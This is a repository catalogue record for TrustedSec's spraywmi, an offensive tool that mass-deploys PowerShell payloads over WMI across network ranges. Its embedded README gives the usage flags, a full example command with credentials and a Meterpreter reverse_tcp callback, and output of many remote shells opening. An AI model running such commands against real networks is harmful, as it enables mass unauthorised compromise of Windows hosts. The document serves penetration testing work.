{"id":13464689,"url":"https://github.com/trustedsec/spraywmi","last_synced_at":"2025-07-08T15:05:42.473Z","repository":{"id":151080785,"uuid":"44243973","full_name":"trustedsec/spraywmi","owner":"trustedsec","description":"SprayWMI is an easy way to get mass shells on systems that support WMI. Much more effective than PSEXEC as it does not leave remnants on a system.","archived":false,"fork":false,"pushed_at":"2015-11-24T15:13:42.000Z","size":1799,"stargazers_count":254,"open_issues_count":3,"forks_count":70,"subscribers_count":23,"default_branch":"master","last_synced_at":"2025-05-10T01:09:07.683Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/trustedsec.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-10-14T11:42:06.000Z","updated_at":"2025-04-17T00:47:05.000Z","dependencies_parsed_at":"2023-04-14T01:23:36.812Z","dependency_job_id":null,"html_url":"https://github.com/trustedsec/spraywmi","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/trustedsec/spraywmi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/trustedsec","download_url":"https://codeload.github.com/trustedsec/spraywmi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264292934,"owners_count":23586061,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T14:00:48.686Z","updated_at":"2025-07-08T15:05:42.456Z","avatar_url":"https://github.com/trustedsec.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"SprayWMI is a method for mass spraying Unicorn PowerShell injection to CIDR notations.\n\nWritten by: David Kennedy (@HackingDave) @TrustedSec\nSpecial thanks to: Justin Elze and Larry Spohn @TrustedSec\n\nInitial blog post: https://www.trustedsec.com/june-2015/no_psexec_needed/\nIf you have trouble with this on 64-bit, try:\ndpkg --add-architecture i386 \u0026\u0026 apt-get update \u0026\u0026 apt-get install libpam0g:i386 \u0026\u0026 apt-get install libpopt0:i386\n\nFlags and descriptions:\n\ndomain                 Domain you are attacking. If its local, just specify workgroup.\n\nusername               Username to authenticate on the remote Windows system.\n\npassword               Password or password hash LM:NTLM to use on the remote Windows system.\n\nCIDR range or file     Specify a single IP, CIDR range (10.0.1.1/24) or multiple CIDRs: 10.0.1.1/24,10.0.2.1/24. \n                          You can also specify a file (ex: ips.txt) that contains a single IP addresses on each line. \npayload                Metasploit payload, example: windows/meterpreter/reverse_tcp\n\nLHOST                  Reverse shell IP address.\n\nLPORT                  Reverse shell listening port.\n\noptional: NO           Specify no if you do not want to create a listener. This is useful if you already have a listener \n                          established. If you do not specify a value, it will automatically create a listener for you.\n\nUsage: python spraywmi.py \u003cdomain\u003e \u003cusername\u003e \u003cpassword\u003e \u003cCIDRrange or file\u003e \u003cpayload\u003e \u003cLHOST\u003e \u003cLPORT\u003e \u003coptional: no\u003e\n\n\nBelow is an example of output from spraywmi:\n\nroot@stronghold:/home/relik# python spraywmi.py TS kennedy-test complexP255w0rd! 10.0.90.1/24,10.0.0.1/24,10.0.59.1/24,10.0.96.1/24,10.0.1.1/24 windows/meterpreter/reverse_tcp 10.0.47.24 443\n\n[*] Generating shellcode through Unicorn, this could take a few seconds.\n\n[*] Launching the listener in the background.\n\n[*] Waiting for the listener to start first before we continue.\n\n[*] Be patient, Metasploit takes a little bit to start.\n\n[*] Sweeping targets for open TCP port 135 first, then moving through. Be patient.\n\n[*] Launching WMI spray against IP: 10.0.90.1 - You should have a shell in the background. Once finished, a shell will spawn.\n\n\u003csnip\u003e\n\n[*] Launching WMI spray against IP: 10.0.96.20 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.96.21 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.96.22 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.96.23 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.96.242 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.1.13 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Spraying is still happening in the background, shells should arrive as they complete.\n\n[*] Interacting with Metasploit.\n\nmsf exploit(handler) \u003e \n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.174\n\n[*] Meterpreter session 1 opened (10.0.47.24:443 -\u003e 10.0.90.174:49868) at 2015-10-13 04:33:55 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.203\n\n[*] Meterpreter session 2 opened (10.0.47.24:443 -\u003e 10.0.90.203:51333) at 2015-10-13 04:33:59 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.184\n\n[*] Meterpreter session 3 opened (10.0.47.24:443 -\u003e 10.0.90.184:61218) at 2015-10-13 04:34:02 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.204\n\n[*] Meterpreter session 4 opened (10.0.47.24:443 -\u003e 10.0.90.204:54219) at 2015-10-13 04:34:06 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.175\n\n[*] Meterpreter session 5 opened (10.0.47.24:443 -\u003e 10.0.90.175:54210) at 2015-10-13 04:34:10 -0400\n\n\u003csnip\u003e\n\n[*] Meterpreter session 13 opened (10.0.47.24:443 -\u003e 10.0.90.248:53657) at 2015-10-13 04:34:31 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.39\n\n[*] Meterpreter session 14 opened (10.0.47.24:443 -\u003e 10.0.90.39:60451) at 2015-10-13 04:34:35 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Fspraywmi","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftrustedsec%2Fspraywmi","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Fspraywmi/lists"}